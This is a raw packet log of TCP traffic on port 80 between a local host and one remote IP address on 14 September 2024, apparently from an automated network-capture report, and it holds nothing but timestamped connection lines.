                                        Sep 14, 2024 18:31:10.127343893 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.127362013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.127401114 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.127443075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.127470016 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.128473043 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.163444996 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163475990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163485050 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163501978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163512945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163558006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163568974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163580894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.163651943 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.163768053 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.163868904 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.208950996 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.208970070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.208981991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.208992958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.209005117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.209016085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.209028006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.209254026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.209306955 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.210452080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210464001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210474968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210484028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210495949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210508108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210517883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210530043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210540056 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210551023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210577011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.210695982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.210767984 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.211112022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211126089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211225033 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211225033 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.211246014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211257935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211270094 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211280107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211292028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211302042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211313009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211324930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211337090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.211438894 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.211502075 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.212177038 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212189913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212199926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212210894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212229967 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212240934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212251902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212265015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212275982 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212286949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212297916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212307930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212316990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212328911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212338924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212349892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212361097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212372065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212382078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212390900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212402105 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212405920 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.212413073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212425947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212436914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.212502003 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.212568045 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.213028908 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213040113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213049889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213058949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213069916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213078976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213088989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213099003 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213109016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213118076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213129044 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213138103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213140011 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.213148117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213212013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213222980 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213232040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213248968 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213258028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213268042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213278055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213288069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213298082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213308096 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213318110 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213327885 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213334084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.213337898 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213351011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213361025 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213371038 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213382006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213392973 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213402987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213416100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213427067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213426113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.213438034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213448048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.213529110 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.216208935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216222048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216232061 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216243029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216253042 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216263056 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216274023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216284990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216295958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216306925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216316938 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216329098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216335058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.216337919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216350079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216361046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216370106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216381073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216392994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216403961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216417074 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216428041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.216511011 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.216590881 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.250375986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250471115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250475883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250480890 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250487089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250494957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250499964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250504971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.250838041 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.296118975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296133041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296139002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296143055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296149015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296154022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296159029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296164036 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296567917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296583891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296592951 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296608925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296617985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296628952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.296684027 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.296684980 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.296880960 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.297523022 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297539949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297549963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297559977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297570944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297581911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297591925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297604084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.297893047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.297893047 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.298062086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298077106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298086882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298161030 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.298173904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298183918 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298193932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298202991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298295975 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.298939943 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298949003 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.298959017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299032927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299041986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299046993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299055099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299063921 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.299066067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299165964 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299175978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299185038 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299240112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299249887 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299258947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299269915 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.299340963 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.299457073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299468994 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299478054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299488068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299499989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299510002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299520016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299530029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299557924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299568892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299581051 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299591064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299601078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299611092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299711943 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.299740076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299750090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299760103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299770117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299778938 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299787998 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.299788952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299801111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299812078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299870968 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.299896002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299907923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299917936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299932957 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299943924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.299982071 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300007105 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300019026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300025940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300029039 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300040960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300051928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300060987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300071001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300081015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300091982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300092936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300105095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300158978 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300225019 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300328970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300340891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300350904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300364017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300374985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300384998 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300412893 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300481081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300492048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300502062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300512075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300510883 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300528049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300538063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300544024 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300553083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300564051 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300569057 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.300574064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.300657034 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.301172018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301182985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301192999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301219940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301229954 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301243067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301254034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301261902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.301417112 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.301479101 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.301986933 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.302036047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.302046061 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.302102089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.302112103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.302122116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.302131891 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.302155018 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.302356005 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.338732958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.338850975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.338860989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.338995934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.339005947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.339015961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.339020967 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.339113951 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.339410067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.382816076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.382843018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.382853985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.382894993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.382905006 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.382915974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.382926941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.382956028 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.382962942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383023977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383033991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383044004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383054018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383160114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383168936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383178949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383189917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.383209944 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.383286953 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.384253979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384279966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384289026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384362936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384372950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384382963 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384394884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384404898 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384496927 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.384555101 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.384833097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384854078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384862900 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384901047 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384912014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384967089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384978056 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.384991884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:10.385062933 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.385123968 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:10.385885954 CEST8049738172.67.203.195192.168.2.4
